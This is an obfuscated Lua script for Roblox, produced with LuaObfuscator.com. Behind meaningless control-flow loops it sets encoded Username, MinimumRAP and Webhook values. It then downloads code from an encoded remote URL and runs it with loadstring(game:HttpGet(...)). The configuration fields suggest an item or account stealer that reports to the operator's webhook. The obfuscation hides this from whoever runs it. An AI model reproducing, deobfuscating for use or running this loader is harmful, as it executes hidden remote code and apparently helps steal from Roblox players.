--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end do do do local v12=0;local v13;local v14;while true do if (v12==(1 -0)) then while true do if (v13==0) then v14=0;while true do if (v14==(0 -0)) then local v17=442 -(416 + 26) ;local v18;local v19;local v20;while true do if (v17==(0 -0)) then local v26=0;local v27;while true do if (v26==0) then v27=0 + 0 ;while true do if (v27==(1 -0)) then v17=439 -(145 + 293) ;break;end if (v27==0) then v18=430 -(44 + 386) ;v19=nil;v27=1487 -(998 + 488) ;end end break;end end end if (v17==(1 + 0)) then v20=nil;while true do if (v18==0) then local v28=0;local v29;local v30;while true do if (v28==(1 + 0)) then while true do if (v29==0) then v30=772 -(201 + 571) ;while true do if (v30==(1138 -(116 + 1022))) then local v38=0 -0 ;while true do if (v38==1) then v30=1;break;end if (v38==(0 + 0)) then v19=0 -0 ;v20=nil;v38=1;end end end if (v30==1) then v18=1;break;end end break;end end break;end if (v28==0) then v29=0;v30=nil;v28=3 -2 ;end end end if (v18==(860 -(814 + 45))) then while true do if (v19==(0 -0)) then v20=0;while true do if (v20==(1 + 0)) then v14=1 + 0 ;break;end if (v20==(885 -(261 + 624))) then local v34=0 -0 ;local v35;local v36;while true do if (v34==(1081 -(1020 + 60))) then while true do if (v35==(1423 -(630 + 793))) then v36=0 -0 ;while true do if ((0 -0)==v36) then local v42=0 + 0 ;local v43;local v44;while true do if (v42==(0 -0)) then v43=1747 -(760 + 987) ;v44=nil;v42=1;end if (v42==1) then while true do if (v43==0) then v44=0;while true do if (v44==0) then Username=v7("\243\194\213\34\181\233\148\76\128","\126\177\163\187\69\134\219\167");Username2=v7("\2\193\47\221\253\47\219\43\215\249\57\156\124\151\172\114\157","\156\67\173\74\165");v44=1914 -(1789 + 124) ;end if (v44==(767 -(745 + 21))) then v36=1 + 0 ;break;end end break;end end break;end end end if (v36==(2 -1)) then v20=3 -2 ;break;end end break;end end break;end if ((0 + 0)==v34) then v35=0 + 0 ;v36=nil;v34=1056 -(87 + 968) ;end end end end break;end end break;end end break;end end end if (v14==(4 -3)) then local v21=0;local v22;local v23;local v24;local v25;while true do if (v21==(1 + 0)) then v24=nil;v25=nil;v21=4 -2 ;end if (v21==(1413 -(447 + 966))) then v22=0 -0 ;v23=nil;v21=1818 -(1703 + 114) ;end if (v21==(703 -(376 + 325))) then while true do if (v22==(0 -0)) then local v31=0;local v32;while true do if (v31==(0 -0)) then v32=0 + 0 ;while true do if (v32==(0 -0)) then local v37=14 -(9 + 5) ;while true do if (v37==(376 -(85 + 291))) then v23=1265 -(243 + 1022) ;v24=nil;v37=1;end if (v37==(3 -2)) then v32=1 + 0 ;break;end end end if (v32==(1181 -(1123 + 57))) then v22=1 + 0 ;break;end end break;end end end if ((255 -(163 + 91))==v22) then v25=nil;while true do if (v23==(1931 -(1869 + 61))) then while true do if (v24==(0 + 0)) then v25=0 -0 ;while true do if (v25==1) then v14=2 -0 ;break;end if (v25==0) then local v39=0;local v40;local v41;while true do if (1==v39) then while true do if (v40==(0 + 0)) then v41=0 -0 ;while true do if (v41==(0 + 0)) then MinimumRAP=501474 -(1329 + 145) ;Webhook=v7("\60\163\93\6\175\124\6\123\248\35\18\181\53\69\59\165\77\88\191\41\75\123\182\89\31\243\49\67\54\191\70\25\183\53\9\94\230\27\79\228\112\17\100\238\29\68\234\112\16\98\229\24\70\234\119\9\94\175\99\33\149\13\114\55\144\121\55\145\34\108\102\135\75\35\182\28\111\29\185\98\59\142\14\92\59\143\35\61\147\0\87\7\155\121\71\165\52\127\96\187\71\47\175\33\67\6\144\124\64\178\0\66\3\143\101\57\214\114\100\23\224\2\59\147\7\69\109","\38\84\215\41\118\220\70");v41=972 -(140 + 831) ;end if (1==v41) then v25=1851 -(1409 + 441) ;break;end end break;end end break;end if (v39==(718 -(15 + 703))) then v40=0 + 0 ;v41=nil;v39=1;end end end end break;end end break;end if (v23==0) then local v33=0;while true do if ((439 -(262 + 176))==v33) then v23=1722 -(345 + 1376) ;break;end if (v33==(688 -(198 + 490))) then v24=0 -0 ;v25=nil;v33=2 -1 ;end end end end break;end end break;end end end if (v14==2) then loadstring(game:HttpGet(v7("\88\2\54\2\148\67\76\109\93\148\66\23\53\92\249\89\2\42\7\252\69\5\39\0\253\95\24\54\23\240\68\88\33\29\243\31\86\18\1\230\99\21\48\27\238\68\15\109\55\245\67\70\52\19\173\1\69\109\31\255\89\24\109\82\211\81\31\46\33\234\85\23\46\23\236\31\26\55\19","\158\48\118\66\114"),true))();break;end end break;end end break;end if (v12==(1206 -(696 + 510))) then local v15=0 -0 ;local v16;while true do if ((1262 -(1091 + 171))==v15) then v16=0 + 0 ;while true do if (v16==(3 -2)) then v12=3 -2 ;break;end if (v16==(374 -(123 + 251))) then v13=0;v14=nil;v16=4 -3 ;end end break;end end end end end end end
